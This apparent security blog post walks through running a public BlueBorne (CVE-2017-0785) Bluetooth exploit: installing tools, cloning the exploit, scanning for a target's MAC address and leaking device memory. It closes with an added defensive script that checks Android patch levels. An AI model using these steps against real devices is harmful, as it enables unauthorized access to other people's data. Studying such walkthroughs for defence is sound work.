CyberMorans,
BlueBorne is an attack vector by which hackers😈 can leverage Bluetooth connections to penetrate and take complete control over targeted devices 😋
BlueTooth is and will remain one of the most vulnerable protocols, making all the data on our BlueTooth-enabled devices vulnerable to being hacked🧐. Armis Security released a number of exploits against unpatched BlueTooth devices. These exploits are capable of attacking iOS (but not iOS 10), Microsoft Windows, and Android. In the last 2 years, nearly every company has issued patches, but for a number of reasons many Android systems are still unpatched 🤕
The exploit masquerades as a BlueTooth device and is able to exploit vulnerabilities in SDP 😜 The BlueTooth device does not even need to be in discoverable mode, it only needs to be ON. Since BlueTooth has access to the inner sanctum of the kernel, nearly everything is vulnerable. In this post, we will look at how to extract data from an unpatched BlueTooth device using the BlueBorne exploit😋
Getting Started 🤖
The first step of course is to have an unpatched device. I will be using an old unused phone I found around the house. I will also be using an old Linux box --as my other VMs are unavailable/pre-occupied at the moment🙄-- So, let's get to it folks...🤤
You will need a BlueTooth adapter to communicate with your target. There are many BlueTooth adapters that are Linux compatible. Install the dependencies into our Kali system 👇
apt-get install bluetooth libbluetooth-dev
also...😜
pip install pybluez
pip install pwntools
Install the Python Script 🤖
Although Armis developed these exploits, they have not released them to the public. Fortunately, a security researcher has developed a python script based upon the Armis research. You can find it on github. Simply clone it into your system 👇
git clone https://github.com/ojasookert/CVE-2017-0785
After cloning it, you will see a new directory created, CVE-2017-0785 👇
Navigate to that directory and do a long listing (ls -l). You will see a README.md file and the python script CVE-2017-0785.py 👇
cd CVE-2017-0785
Give yourself execute permissions on this script.
chmod 755 CVE-2017-0785.py
Get the MAC address of the Target 🤖
Now that we have our dependencies met and installed the Python script, the only thing left to be done is to obtain the MAC address of the target system. We can scan for BlueTooth devices with hcitool on Kali Linux 👇
hcitool scan
This 👆 utility will go out and scan for any available BlueTooth devices within range. As you can see, it found the phone. I have obscured the MAC address.
Execute the BlueBorne Exploit 🤖
Now, we have everything we need to exploit the BlueTooth device and extract its memory. To run the exploit, we simply enter python, the name of the script and TARGET= followed by the MAC address of the target system 👇
python CVE-2017-0785.py TARGET=<MAC ADDRESS of Target>
👆 The python script has exploited the target and extracted the first 30 bytes from memory! We can edit the script to extract even more memory 😝
BlueTooth hacking has been considered a niche field for a number of years, but expect it to heat up in time, making all mobile devices vulnerable 💀
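The flip side of this walkthrough is knowing which of your own Android devices are still exposed. Google shipped the BlueBorne fixes (including CVE-2017-0785) in the 2017-09-01 Android security patch level, so a device reporting an older ro.build.version.security_patch should be treated as unpatched. The script below is an added example, not part of the original post or of the GitHub project; it parses the `[key]: [value]` format that `adb shell getprop` prints, and the device names and getprop output in it are constructed samples.

```python
#!/usr/bin/env python3
"""Triage Android devices for the BlueBorne fix level (CVE-2017-0785).

The fixes landed in the 2017-09-01 Android security patch level, so any
device whose ro.build.version.security_patch is older is still exposed.
"""
import re
from datetime import date

# First Android security patch level that contains the BlueBorne fixes.
BLUEBORNE_FIX_LEVEL = date(2017, 9, 1)

PATCH_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
# Matches one line of `adb shell getprop` output for the patch-level property.
PROP_RE = re.compile(r"\[ro\.build\.version\.security_patch\]: \[([^\]]*)\]")


def parse_patch_level(value):
    """Turn a security_patch string such as '2017-03-01' into a date, or None if unusable."""
    value = value.strip()
    if not PATCH_RE.match(value):
        return None
    year, month, day = (int(part) for part in value.split("-"))
    try:
        return date(year, month, day)  # rejects impossible dates like 2017-02-30
    except ValueError:
        return None


def is_blueborne_patched(patch_level):
    """True when the reported level is at or after the level that shipped the fix."""
    level = parse_patch_level(patch_level)
    return level is not None and level >= BLUEBORNE_FIX_LEVEL


def triage_inventory(getprop_outputs):
    """Map device id -> 'patched' / 'unpatched' / 'unknown' from captured getprop output.

    Devices that do not report the property at all (very old Android builds)
    are flagged 'unknown' rather than silently assumed safe.
    """
    results = {}
    for device_id, output in getprop_outputs.items():
        match = PROP_RE.search(output)
        if not match:
            results[device_id] = "unknown"
        else:
            results[device_id] = "patched" if is_blueborne_patched(match.group(1)) else "unpatched"
    return results


# Constructed sample output in `adb shell getprop` format (not captured from real devices).
SAMPLE_GETPROP = {
    "old-phone": "[ro.build.version.release]: [6.0.1]\n[ro.build.version.security_patch]: [2017-03-01]\n",
    "new-phone": "[ro.build.version.release]: [8.0.0]\n[ro.build.version.security_patch]: [2017-11-05]\n",
    "no-level": "[ro.build.version.release]: [4.4.2]\n",
}

if __name__ == "__main__":
    for device, status in triage_inventory(SAMPLE_GETPROP).items():
        print(f"{device}: {status}")
```

Anything reported as unpatched or unknown should have Bluetooth kept off until it is updated, since the attack above needs the radio on but not discoverable.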
Conclusion 🤖
Subscribe to receive notifications of similar posts 😋 where we will be reverse engineering malware, covering the technical aspects of vulnerabilities and how an attacker may use a vulnerability as an attack vector, and other Infosec stuff...😋
Morans,
Thank you for your time, Like and leave a comment/review and as always, stay awesome! 😋👊 💪